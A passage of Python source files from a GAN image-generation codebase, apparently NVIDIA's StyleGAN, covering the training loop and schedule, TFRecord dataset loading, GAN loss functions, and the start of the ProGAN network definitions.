misc.adjust_dynamic_range(x, drange_data, drange_net) if mirror_augment: with tf.name_scope('MirrorAugment'): s = tf.shape(x) mask = tf.random_uniform([s[0], 1, 1, 1], 0.0, 1.0) mask = tf.tile(mask, [1, s[1], s[2], s[3]]) x = tf.where(mask < 0.5, x, tf.reverse(x, axis=[3])) with tf.name_scope('FadeLOD'): # Smooth crossfade between consecutive levels-of-detail. s = tf.shape(x) y = tf.reshape(x, [-1, s[1], s[2]//2, 2, s[3]//2, 2]) y = tf.reduce_mean(y, axis=[3, 5], keepdims=True) y = tf.tile(y, [1, 1, 1, 2, 1, 2]) y = tf.reshape(y, [-1, s[1], s[2], s[3]]) x = tflib.lerp(x, y, lod - tf.floor(lod)) with tf.name_scope('UpscaleLOD'): # Upscale to match the expected input/output size of the networks. s = tf.shape(x) factor = tf.cast(2 ** tf.floor(lod), tf.int32) x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1]) x = tf.tile(x, [1, 1, 1, factor, 1, factor]) x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor]) return x #---------------------------------------------------------------------------- # Evaluate time-varying training parameters. def training_schedule( cur_nimg, training_set, num_gpus, lod_initial_resolution = 4, # Image resolution used at the beginning. lod_training_kimg = 600, # Thousands of real images to show before doubling the resolution. lod_transition_kimg = 600, # Thousands of real images to show when fading in new layers. minibatch_base = 16, # Maximum minibatch size, divided evenly among GPUs. minibatch_dict = {}, # Resolution-specific overrides. max_minibatch_per_gpu = {}, # Resolution-specific maximum minibatch size per GPU. G_lrate_base = 0.001, # Learning rate for the generator. G_lrate_dict = {}, # Resolution-specific overrides. D_lrate_base = 0.001, # Learning rate for the discriminator. D_lrate_dict = {}, # Resolution-specific overrides. lrate_rampup_kimg = 0, # Duration of learning rate ramp-up. tick_kimg_base = 160, # Default interval of progress snapshots. tick_kimg_dict = {4: 160, 8:140, 16:120, 32:100, 64:80, 128:60, 256:40, 512:30, 1024:20}): # Resolution-specific overrides. # Initialize result dict. s = dnnlib.EasyDict() s.kimg = cur_nimg / 1000.0 # Training phase. phase_dur = lod_training_kimg + lod_transition_kimg phase_idx = int(np.floor(s.kimg / phase_dur)) if phase_dur > 0 else 0 phase_kimg = s.kimg - phase_idx * phase_dur # Level-of-detail and resolution. s.lod = training_set.resolution_log2 s.lod -= np.floor(np.log2(lod_initial_resolution)) s.lod -= phase_idx if lod_transition_kimg > 0: s.lod -= max(phase_kimg - lod_training_kimg, 0.0) / lod_transition_kimg s.lod = max(s.lod, 0.0) s.resolution = 2 ** (training_set.resolution_log2 - int(np.floor(s.lod))) # Minibatch size. s.minibatch = minibatch_dict.get(s.resolution, minibatch_base) s.minibatch -= s.minibatch % num_gpus if s.resolution in max_minibatch_per_gpu: s.minibatch = min(s.minibatch, max_minibatch_per_gpu[s.resolution] * num_gpus) # Learning rate. s.G_lrate = G_lrate_dict.get(s.resolution, G_lrate_base) s.D_lrate = D_lrate_dict.get(s.resolution, D_lrate_base) if lrate_rampup_kimg > 0: rampup = min(s.kimg / lrate_rampup_kimg, 1.0) s.G_lrate *= rampup s.D_lrate *= rampup # Other parameters. s.tick_kimg = tick_kimg_dict.get(s.resolution, tick_kimg_base) return s #---------------------------------------------------------------------------- # Main training script. def training_loop( submit_config, G_args = {}, # Options for generator network. D_args = {}, # Options for discriminator network. G_opt_args = {}, # Options for generator optimizer. D_opt_args = {}, # Options for discriminator optimizer. G_loss_args = {}, # Options for generator loss. D_loss_args = {}, # Options for discriminator loss. dataset_args = {}, # Options for dataset.load_dataset(). sched_args = {}, # Options for train.TrainingSchedule. grid_args = {}, # Options for train.setup_snapshot_image_grid(). metric_arg_list = [], # Options for MetricGroup. tf_config = {}, # Options for tflib.init_tf(). G_smoothing_kimg = 10.0, # Half-life of the running average of generator weights. D_repeats = 1, # How many times the discriminator is trained per G iteration. minibatch_repeats = 4, # Number of minibatches to run before adjusting training parameters. reset_opt_for_new_lod = True, # Reset optimizer internal state (e.g. Adam moments) when new layers are introduced? total_kimg = 15000, # Total length of the training, measured in thousands of real images. mirror_augment = False, # Enable mirror augment? drange_net = [-1,1], # Dynamic range used when feeding image data to the networks. image_snapshot_ticks = 1, # How often to export image snapshots? network_snapshot_ticks = 10, # How often to export network snapshots? save_tf_graph = False, # Include full TensorFlow computation graph in the tfevents file? save_weight_histograms = False, # Include weight histograms in the tfevents file? resume_run_id = None, # Run ID or network pkl to resume training from, None = start from scratch. resume_snapshot = None, # Snapshot index to resume training from, None = autodetect. resume_kimg = 0.0, # Assumed training progress at the beginning. Affects reporting and training schedule. resume_time = 0.0): # Assumed wallclock time at the beginning. Affects reporting. # Initialize dnnlib and TensorFlow. ctx = dnnlib.RunContext(submit_config, train) tflib.init_tf(tf_config) # Load training set. training_set = dataset.load_dataset(data_dir=config.data_dir, verbose=True, **dataset_args) # Construct networks. with tf.device('/gpu:0'): if resume_run_id is not None: network_pkl = misc.locate_network_pkl(resume_run_id, resume_snapshot) print('Loading networks from "%s"...' % network_pkl) G, D, Gs = misc.load_pkl(network_pkl) else: print('Constructing networks...') G = tflib.Network('G', num_channels=training_set.shape[0], resolution=training_set.shape[1], label_size=training_set.label_size, **G_args) D = tflib.Network('D', num_channels=training_set.shape[0], resolution=training_set.shape[1], label_size=training_set.label_size, **D_args) Gs = G.clone('Gs') G.print_layers(); D.print_layers() print('Building TensorFlow graph...') with tf.name_scope('Inputs'), tf.device('/cpu:0'): lod_in = tf.placeholder(tf.float32, name='lod_in', shape=[]) lrate_in = tf.placeholder(tf.float32, name='lrate_in', shape=[]) minibatch_in = tf.placeholder(tf.int32, name='minibatch_in', shape=[]) minibatch_split = minibatch_in // submit_config.num_gpus Gs_beta = 0.5 ** tf.div(tf.cast(minibatch_in, tf.float32), G_smoothing_kimg * 1000.0) if G_smoothing_kimg > 0.0 else 0.0 G_opt = tflib.Optimizer(name='TrainG', learning_rate=lrate_in, **G_opt_args) D_opt = tflib.Optimizer(name='TrainD', learning_rate=lrate_in, **D_opt_args) for gpu in range(submit_config.num_gpus): with tf.name_scope('GPU%d' % gpu), tf.device('/gpu:%d' % gpu): G_gpu = G if gpu == 0 else G.clone(G.name + '_shadow') D_gpu = D if gpu == 0 else D.clone(D.name + '_shadow') lod_assign_ops = [tf.assign(G_gpu.find_var('lod'), lod_in), tf.assign(D_gpu.find_var('lod'), lod_in)] reals, labels = training_set.get_minibatch_tf() reals = process_reals(reals, lod_in, mirror_augment, training_set.dynamic_range, drange_net) with tf.name_scope('G_loss'), tf.control_dependencies(lod_assign_ops): G_loss = dnnlib.util.call_func_by_name(G=G_gpu, D=D_gpu, opt=G_opt, training_set=training_set, minibatch_size=minibatch_split, **G_loss_args) with tf.name_scope('D_loss'), tf.control_dependencies(lod_assign_ops): D_loss = dnnlib.util.call_func_by_name(G=G_gpu, D=D_gpu, opt=D_opt, training_set=training_set, minibatch_size=minibatch_split, reals=reals, labels=labels, **D_loss_args) G_opt.register_gradients(tf.reduce_mean(G_loss), G_gpu.trainables) D_opt.register_gradients(tf.reduce_mean(D_loss), D_gpu.trainables) G_train_op = G_opt.apply_updates() D_train_op = D_opt.apply_updates() Gs_update_op = Gs.setup_as_moving_average_of(G, beta=Gs_beta) with tf.device('/gpu:0'): try: peak_gpu_mem_op = tf.contrib.memory_stats.MaxBytesInUse() except tf.errors.NotFoundError: peak_gpu_mem_op = tf.constant(0) print('Setting up snapshot image grid...') grid_size, grid_reals, grid_labels, grid_latents = misc.setup_snapshot_image_grid(G, training_set, **grid_args) sched = training_schedule(cur_nimg=total_kimg*1000, training_set=training_set, num_gpus=submit_config.num_gpus, **sched_args) grid_fakes = Gs.run(grid_latents, grid_labels, is_validation=True, minibatch_size=sched.minibatch//submit_config.num_gpus) print('Setting up run dir...') misc.save_image_grid(grid_reals, os.path.join(submit_config.run_dir, 'reals.png'), drange=training_set.dynamic_range, grid_size=grid_size) misc.save_image_grid(grid_fakes, os.path.join(submit_config.run_dir, 'fakes%06d.png' % resume_kimg), drange=drange_net, grid_size=grid_size) summary_log = tf.summary.FileWriter(submit_config.run_dir) if save_tf_graph: summary_log.add_graph(tf.get_default_graph()) if save_weight_histograms: G.setup_weight_histograms(); D.setup_weight_histograms() metrics = metric_base.MetricGroup(metric_arg_list) print('Training...\n') ctx.update('', cur_epoch=resume_kimg, max_epoch=total_kimg) maintenance_time = ctx.get_last_update_interval() cur_nimg = int(resume_kimg * 1000) cur_tick = 0 tick_start_nimg = cur_nimg prev_lod = -1.0 while cur_nimg < total_kimg * 1000: if ctx.should_stop(): break # Choose training parameters and configure training ops. sched = training_schedule(cur_nimg=cur_nimg, training_set=training_set, num_gpus=submit_config.num_gpus, **sched_args) training_set.configure(sched.minibatch // submit_config.num_gpus, sched.lod) if reset_opt_for_new_lod: if np.floor(sched.lod) != np.floor(prev_lod) or np.ceil(sched.lod) != np.ceil(prev_lod): G_opt.reset_optimizer_state(); D_opt.reset_optimizer_state() prev_lod = sched.lod # Run training ops. for _mb_repeat in range(minibatch_repeats): for _D_repeat in range(D_repeats): tflib.run([D_train_op, Gs_update_op], {lod_in: sched.lod, lrate_in: sched.D_lrate, minibatch_in: sched.minibatch}) cur_nimg += sched.minibatch tflib.run([G_train_op], {lod_in: sched.lod, lrate_in: sched.G_lrate, minibatch_in: sched.minibatch}) # Perform maintenance tasks once per tick. done = (cur_nimg >= total_kimg * 1000) if cur_nimg >= tick_start_nimg + sched.tick_kimg * 1000 or done: cur_tick += 1 tick_kimg = (cur_nimg - tick_start_nimg) / 1000.0 tick_start_nimg = cur_nimg tick_time = ctx.get_time_since_last_update() total_time = ctx.get_time_since_start() + resume_time # Report progress. print('tick %-5d kimg %-8.1f lod %-5.2f minibatch %-4d time %-12s sec/tick %-7.1f sec/kimg %-7.2f maintenance %-6.1f gpumem %-4.1f' % ( autosummary('Progress/tick', cur_tick), autosummary('Progress/kimg', cur_nimg / 1000.0), autosummary('Progress/lod', sched.lod), autosummary('Progress/minibatch', sched.minibatch), dnnlib.util.format_time(autosummary('Timing/total_sec', total_time)), autosummary('Timing/sec_per_tick', tick_time), autosummary('Timing/sec_per_kimg', tick_time / tick_kimg), autosummary('Timing/maintenance_sec', maintenance_time), autosummary('Resources/peak_gpu_mem_gb', peak_gpu_mem_op.eval() / 2**30))) autosummary('Timing/total_hours', total_time / (60.0 * 60.0)) autosummary('Timing/total_days', total_time / (24.0 * 60.0 * 60.0)) # Save snapshots. if cur_tick % image_snapshot_ticks == 0 or done: grid_fakes = Gs.run(grid_latents, grid_labels, is_validation=True, minibatch_size=sched.minibatch//submit_config.num_gpus) misc.save_image_grid(grid_fakes, os.path.join(submit_config.run_dir, 'fakes%06d.png' % (cur_nimg // 1000)), drange=drange_net, grid_size=grid_size) if cur_tick % network_snapshot_ticks == 0 or done or cur_tick == 1: pkl = os.path.join(submit_config.run_dir, 'network-snapshot-%06d.pkl' % (cur_nimg // 1000)) misc.save_pkl((G, D, Gs), pkl) metrics.run(pkl, run_dir=submit_config.run_dir, num_gpus=submit_config.num_gpus, tf_config=tf_config) # Update summaries and RunContext. metrics.update_autosummaries() tflib.autosummary.save_summaries(summary_log, cur_nimg) ctx.update('%.2f' % sched.lod, cur_epoch=cur_nimg // 1000, max_epoch=total_kimg) maintenance_time = ctx.get_last_update_interval() - tick_time # Write final results. misc.save_pkl((G, D, Gs), os.path.join(submit_config.run_dir, 'network-final.pkl')) summary_log.close() ctx.close() #---------------------------------------------------------------------------- File: training/dataset.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Multi-resolution input data pipeline.""" import os import glob import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib #---------------------------------------------------------------------------- # Parse individual image from a tfrecords file. def parse_tfrecord_tf(record): features = tf.parse_single_example(record, features={ 'shape': tf.FixedLenFeature([3], tf.int64), 'data': tf.FixedLenFeature([], tf.string)}) data = tf.decode_raw(features['data'], tf.uint8) return tf.reshape(data, features['shape']) def parse_tfrecord_np(record): ex = tf.train.Example() ex.ParseFromString(record) shape = ex.features.feature['shape'].int64_list.value # temporary pylint workaround # pylint: disable=no-member data = ex.features.feature['data'].bytes_list.value[0] # temporary pylint workaround # pylint: disable=no-member return np.fromstring(data, np.uint8).reshape(shape) #---------------------------------------------------------------------------- # Dataset class that loads data from tfrecords files. class TFRecordDataset: def __init__(self, tfrecord_dir, # Directory containing a collection of tfrecords files. resolution = None, # Dataset resolution, None = autodetect. label_file = None, # Relative path of the labels file, None = autodetect. max_label_size = 0, # 0 = no labels, 'full' = full labels, <int> = N first label components. repeat = True, # Repeat dataset indefinitely. shuffle_mb = 4096, # Shuffle data within specified window (megabytes), 0 = disable shuffling. prefetch_mb = 2048, # Amount of data to prefetch (megabytes), 0 = disable prefetching. buffer_mb = 256, # Read buffer size (megabytes). num_threads = 2): # Number of concurrent threads. self.tfrecord_dir = tfrecord_dir self.resolution = None self.resolution_log2 = None self.shape = [] # [channel, height, width] self.dtype = 'uint8' self.dynamic_range = [0, 255] self.label_file = label_file self.label_size = None # [component] self.label_dtype = None self._np_labels = None self._tf_minibatch_in = None self._tf_labels_var = None self._tf_labels_dataset = None self._tf_datasets = dict() self._tf_iterator = None self._tf_init_ops = dict() self._tf_minibatch_np = None self._cur_minibatch = -1 self._cur_lod = -1 # List tfrecords files and inspect their shapes. assert os.path.isdir(self.tfrecord_dir) tfr_files = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.tfrecords'))) assert len(tfr_files) >= 1 tfr_shapes = [] for tfr_file in tfr_files: tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE) for record in tf.python_io.tf_record_iterator(tfr_file, tfr_opt): tfr_shapes.append(parse_tfrecord_np(record).shape) break # Autodetect label filename. if self.label_file is None: guess = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.labels'))) if len(guess): self.label_file = guess[0] elif not os.path.isfile(self.label_file): guess = os.path.join(self.tfrecord_dir, self.label_file) if os.path.isfile(guess): self.label_file = guess # Determine shape and resolution. max_shape = max(tfr_shapes, key=np.prod) self.resolution = resolution if resolution is not None else max_shape[1] self.resolution_log2 = int(np.log2(self.resolution)) self.shape = [max_shape[0], self.resolution, self.resolution] tfr_lods = [self.resolution_log2 - int(np.log2(shape[1])) for shape in tfr_shapes] assert all(shape[0] == max_shape[0] for shape in tfr_shapes) assert all(shape[1] == shape[2] for shape in tfr_shapes) assert all(shape[1] == self.resolution // (2**lod) for shape, lod in zip(tfr_shapes, tfr_lods)) assert all(lod in tfr_lods for lod in range(self.resolution_log2 - 1)) # Load labels. assert max_label_size == 'full' or max_label_size >= 0 self._np_labels = np.zeros([1<<20, 0], dtype=np.float32) if self.label_file is not None and max_label_size != 0: self._np_labels = np.load(self.label_file) assert self._np_labels.ndim == 2 if max_label_size != 'full' and self._np_labels.shape[1] > max_label_size: self._np_labels = self._np_labels[:, :max_label_size] self.label_size = self._np_labels.shape[1] self.label_dtype = self._np_labels.dtype.name # Build TF expressions. with tf.name_scope('Dataset'), tf.device('/cpu:0'): self._tf_minibatch_in = tf.placeholder(tf.int64, name='minibatch_in', shape=[]) self._tf_labels_var = tflib.create_var_with_large_initial_value(self._np_labels, name='labels_var') self._tf_labels_dataset = tf.data.Dataset.from_tensor_slices(self._tf_labels_var) for tfr_file, tfr_shape, tfr_lod in zip(tfr_files, tfr_shapes, tfr_lods): if tfr_lod < 0: continue dset = tf.data.TFRecordDataset(tfr_file, compression_type='', buffer_size=buffer_mb<<20) dset = dset.map(parse_tfrecord_tf, num_parallel_calls=num_threads) dset = tf.data.Dataset.zip((dset, self._tf_labels_dataset)) bytes_per_item = np.prod(tfr_shape) * np.dtype(self.dtype).itemsize if shuffle_mb > 0: dset = dset.shuffle(((shuffle_mb << 20) - 1) // bytes_per_item + 1) if repeat: dset = dset.repeat() if prefetch_mb > 0: dset = dset.prefetch(((prefetch_mb << 20) - 1) // bytes_per_item + 1) dset = dset.batch(self._tf_minibatch_in) self._tf_datasets[tfr_lod] = dset self._tf_iterator = tf.data.Iterator.from_structure(self._tf_datasets[0].output_types, self._tf_datasets[0].output_shapes) self._tf_init_ops = {lod: self._tf_iterator.make_initializer(dset) for lod, dset in self._tf_datasets.items()} # Use the given minibatch size and level-of-detail for the data returned by get_minibatch_tf(). def configure(self, minibatch_size, lod=0): lod = int(np.floor(lod)) assert minibatch_size >= 1 and lod in self._tf_datasets if self._cur_minibatch != minibatch_size or self._cur_lod != lod: self._tf_init_ops[lod].run({self._tf_minibatch_in: minibatch_size}) self._cur_minibatch = minibatch_size self._cur_lod = lod # Get next minibatch as TensorFlow expressions. def get_minibatch_tf(self): # => images, labels return self._tf_iterator.get_next() # Get next minibatch as NumPy arrays. def get_minibatch_np(self, minibatch_size, lod=0): # => images, labels self.configure(minibatch_size, lod) if self._tf_minibatch_np is None: self._tf_minibatch_np = self.get_minibatch_tf() return tflib.run(self._tf_minibatch_np) # Get random labels as TensorFlow expression. def get_random_labels_tf(self, minibatch_size): # => labels if self.label_size > 0: with tf.device('/cpu:0'): return tf.gather(self._tf_labels_var, tf.random_uniform([minibatch_size], 0, self._np_labels.shape[0], dtype=tf.int32)) return tf.zeros([minibatch_size, 0], self.label_dtype) # Get random labels as NumPy array. def get_random_labels_np(self, minibatch_size): # => labels if self.label_size > 0: return self._np_labels[np.random.randint(self._np_labels.shape[0], size=[minibatch_size])] return np.zeros([minibatch_size, 0], self.label_dtype) #---------------------------------------------------------------------------- # Base class for datasets that are generated on the fly. class SyntheticDataset: def __init__(self, resolution=1024, num_channels=3, dtype='uint8', dynamic_range=[0,255], label_size=0, label_dtype='float32'): self.resolution = resolution self.resolution_log2 = int(np.log2(resolution)) self.shape = [num_channels, resolution, resolution] self.dtype = dtype self.dynamic_range = dynamic_range self.label_size = label_size self.label_dtype = label_dtype self._tf_minibatch_var = None self._tf_lod_var = None self._tf_minibatch_np = None self._tf_labels_np = None assert self.resolution == 2 ** self.resolution_log2 with tf.name_scope('Dataset'): self._tf_minibatch_var = tf.Variable(np.int32(0), name='minibatch_var') self._tf_lod_var = tf.Variable(np.int32(0), name='lod_var') def configure(self, minibatch_size, lod=0): lod = int(np.floor(lod)) assert minibatch_size >= 1 and 0 <= lod <= self.resolution_log2 tflib.set_vars({self._tf_minibatch_var: minibatch_size, self._tf_lod_var: lod}) def get_minibatch_tf(self): # => images, labels with tf.name_scope('SyntheticDataset'): shrink = tf.cast(2.0 ** tf.cast(self._tf_lod_var, tf.float32), tf.int32) shape = [self.shape[0], self.shape[1] // shrink, self.shape[2] // shrink] images = self._generate_images(self._tf_minibatch_var, self._tf_lod_var, shape) labels = self._generate_labels(self._tf_minibatch_var) return images, labels def get_minibatch_np(self, minibatch_size, lod=0): # => images, labels self.configure(minibatch_size, lod) if self._tf_minibatch_np is None: self._tf_minibatch_np = self.get_minibatch_tf() return tflib.run(self._tf_minibatch_np) def get_random_labels_tf(self, minibatch_size): # => labels with tf.name_scope('SyntheticDataset'): return self._generate_labels(minibatch_size) def get_random_labels_np(self, minibatch_size): # => labels self.configure(minibatch_size) if self._tf_labels_np is None: self._tf_labels_np = self.get_random_labels_tf(minibatch_size) return tflib.run(self._tf_labels_np) def _generate_images(self, minibatch, lod, shape): # to be overridden by subclasses # pylint: disable=unused-argument return tf.zeros([minibatch] + shape, self.dtype) def _generate_labels(self, minibatch): # to be overridden by subclasses return tf.zeros([minibatch, self.label_size], self.label_dtype) #---------------------------------------------------------------------------- # Helper func for constructing a dataset object using the given options. def load_dataset(class_name='training.dataset.TFRecordDataset', data_dir=None, verbose=False, **kwargs): adjusted_kwargs = dict(kwargs) if 'tfrecord_dir' in adjusted_kwargs and data_dir is not None: adjusted_kwargs['tfrecord_dir'] = os.path.join(data_dir, adjusted_kwargs['tfrecord_dir']) if verbose: print('Streaming data using %s...' % class_name) dataset = dnnlib.util.get_obj_by_name(class_name)(**adjusted_kwargs) if verbose: print('Dataset shape =', np.int32(dataset.shape).tolist()) print('Dynamic range =', dataset.dynamic_range) print('Label size =', dataset.label_size) return dataset #---------------------------------------------------------------------------- File: training/loss.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Loss functions.""" import tensorflow as tf import dnnlib.tflib as tflib from dnnlib.tflib.autosummary import autosummary #---------------------------------------------------------------------------- # Convenience func that casts all of its arguments to tf.float32. def fp32(*values): if len(values) == 1 and isinstance(values[0], tuple): values = values[0] values = tuple(tf.cast(v, tf.float32) for v in values) return values if len(values) >= 2 else values[0] #---------------------------------------------------------------------------- # WGAN & WGAN-GP loss functions. def G_wgan(G, D, opt, training_set, minibatch_size): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) labels = training_set.get_random_labels_tf(minibatch_size) fake_images_out = G.get_output_for(latents, labels, is_training=True) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) loss = -fake_scores_out return loss def D_wgan(G, D, opt, training_set, minibatch_size, reals, labels, # pylint: disable=unused-argument wgan_epsilon = 0.001): # Weight for the epsilon term, \epsilon_{drift}. latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = fake_scores_out - real_scores_out with tf.name_scope('EpsilonPenalty'): epsilon_penalty = autosummary('Loss/epsilon_penalty', tf.square(real_scores_out)) loss += epsilon_penalty * wgan_epsilon return loss def D_wgan_gp(G, D, opt, training_set, minibatch_size, reals, labels, # pylint: disable=unused-argument wgan_lambda = 10.0, # Weight for the gradient penalty term. wgan_epsilon = 0.001, # Weight for the epsilon term, \epsilon_{drift}. wgan_target = 1.0): # Target value for gradient magnitudes. latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = fake_scores_out - real_scores_out with tf.name_scope('GradientPenalty'): mixing_factors = tf.random_uniform([minibatch_size, 1, 1, 1], 0.0, 1.0, dtype=fake_images_out.dtype) mixed_images_out = tflib.lerp(tf.cast(reals, fake_images_out.dtype), fake_images_out, mixing_factors) mixed_scores_out = fp32(D.get_output_for(mixed_images_out, labels, is_training=True)) mixed_scores_out = autosummary('Loss/scores/mixed', mixed_scores_out) mixed_loss = opt.apply_loss_scaling(tf.reduce_sum(mixed_scores_out)) mixed_grads = opt.undo_loss_scaling(fp32(tf.gradients(mixed_loss, [mixed_images_out])[0])) mixed_norms = tf.sqrt(tf.reduce_sum(tf.square(mixed_grads), axis=[1,2,3])) mixed_norms = autosummary('Loss/mixed_norms', mixed_norms) gradient_penalty = tf.square(mixed_norms - wgan_target) loss += gradient_penalty * (wgan_lambda / (wgan_target**2)) with tf.name_scope('EpsilonPenalty'): epsilon_penalty = autosummary('Loss/epsilon_penalty', tf.square(real_scores_out)) loss += epsilon_penalty * wgan_epsilon return loss #---------------------------------------------------------------------------- # Hinge loss functions. (Use G_wgan with these) def D_hinge(G, D, opt, training_set, minibatch_size, reals, labels): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.maximum(0., 1.+fake_scores_out) + tf.maximum(0., 1.-real_scores_out) return loss def D_hinge_gp(G, D, opt, training_set, minibatch_size, reals, labels, # pylint: disable=unused-argument wgan_lambda = 10.0, # Weight for the gradient penalty term. wgan_target = 1.0): # Target value for gradient magnitudes. latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.maximum(0., 1.+fake_scores_out) + tf.maximum(0., 1.-real_scores_out) with tf.name_scope('GradientPenalty'): mixing_factors = tf.random_uniform([minibatch_size, 1, 1, 1], 0.0, 1.0, dtype=fake_images_out.dtype) mixed_images_out = tflib.lerp(tf.cast(reals, fake_images_out.dtype), fake_images_out, mixing_factors) mixed_scores_out = fp32(D.get_output_for(mixed_images_out, labels, is_training=True)) mixed_scores_out = autosummary('Loss/scores/mixed', mixed_scores_out) mixed_loss = opt.apply_loss_scaling(tf.reduce_sum(mixed_scores_out)) mixed_grads = opt.undo_loss_scaling(fp32(tf.gradients(mixed_loss, [mixed_images_out])[0])) mixed_norms = tf.sqrt(tf.reduce_sum(tf.square(mixed_grads), axis=[1,2,3])) mixed_norms = autosummary('Loss/mixed_norms', mixed_norms) gradient_penalty = tf.square(mixed_norms - wgan_target) loss += gradient_penalty * (wgan_lambda / (wgan_target**2)) return loss #---------------------------------------------------------------------------- # Loss functions advocated by the paper # "Which Training Methods for GANs do actually Converge?" def G_logistic_saturating(G, D, opt, training_set, minibatch_size): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) labels = training_set.get_random_labels_tf(minibatch_size) fake_images_out = G.get_output_for(latents, labels, is_training=True) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) loss = -tf.nn.softplus(fake_scores_out) # log(1 - logistic(fake_scores_out)) return loss def G_logistic_nonsaturating(G, D, opt, training_set, minibatch_size): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) labels = training_set.get_random_labels_tf(minibatch_size) fake_images_out = G.get_output_for(latents, labels, is_training=True) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) loss = tf.nn.softplus(-fake_scores_out) # -log(logistic(fake_scores_out)) return loss def D_logistic(G, D, opt, training_set, minibatch_size, reals, labels): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.nn.softplus(fake_scores_out) # -log(1 - logistic(fake_scores_out)) loss += tf.nn.softplus(-real_scores_out) # -log(logistic(real_scores_out)) # temporary pylint workaround # pylint: disable=invalid-unary-operand-type return loss def D_logistic_simplegp(G, D, opt, training_set, minibatch_size, reals, labels, r1_gamma=10.0, r2_gamma=0.0): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.nn.softplus(fake_scores_out) # -log(1 - logistic(fake_scores_out)) loss += tf.nn.softplus(-real_scores_out) # -log(logistic(real_scores_out)) # temporary pylint workaround # pylint: disable=invalid-unary-operand-type if r1_gamma != 0.0: with tf.name_scope('R1Penalty'): real_loss = opt.apply_loss_scaling(tf.reduce_sum(real_scores_out)) real_grads = opt.undo_loss_scaling(fp32(tf.gradients(real_loss, [reals])[0])) r1_penalty = tf.reduce_sum(tf.square(real_grads), axis=[1,2,3]) r1_penalty = autosummary('Loss/r1_penalty', r1_penalty) loss += r1_penalty * (r1_gamma * 0.5) if r2_gamma != 0.0: with tf.name_scope('R2Penalty'): fake_loss = opt.apply_loss_scaling(tf.reduce_sum(fake_scores_out)) fake_grads = opt.undo_loss_scaling(fp32(tf.gradients(fake_loss, [fake_images_out])[0])) r2_penalty = tf.reduce_sum(tf.square(fake_grads), axis=[1,2,3]) r2_penalty = autosummary('Loss/r2_penalty', r2_penalty) loss += r2_penalty * (r2_gamma * 0.5) return loss #---------------------------------------------------------------------------- File: training/networks_progan.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Network architectures used in the ProGAN paper.""" import numpy as np import tensorflow as tf # NOTE: Do not import any application-specific modules here! # Specify all network parameters as kwargs. #---------------------------------------------------------------------------- def lerp(a, b, t): return a + (b - a) * t def lerp_clip(a, b, t): return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0) def cset(cur_lambda, new_cond, new_lambda): return lambda: tf.cond(new_cond, new_lambda, cur_lambda) 